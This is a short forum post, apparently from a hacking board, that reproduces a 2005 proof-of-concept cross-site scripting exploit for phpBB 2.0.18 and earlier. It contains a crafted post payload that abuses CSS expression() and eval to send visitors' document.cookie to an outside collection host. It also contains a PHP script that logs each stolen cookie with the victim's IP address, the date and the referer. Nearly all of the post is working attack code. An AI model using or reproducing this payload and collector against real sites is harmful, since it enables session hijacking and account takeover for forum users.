dzadzuks Ametuar Posts: 135
| Tested by myselfe: No Code: php, html
Code: | ****************************************************************** phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept -- 'the html is on exploit' original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005 -- http://securityreason.com/securityalert/269/ proof of concept by: jet -- http://jet.carbon-4.net/ develop a pure, lucid mind, not depending upon sound, flavor, touch, odor, or any quality. - the diamond sutra ******************************************************************/ phpbb code: <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B> c.php: <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s a"); $referer=getenv ('HTTP_REFERER'); $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n"); fclose($fl); ?> [2005-12-21] |
|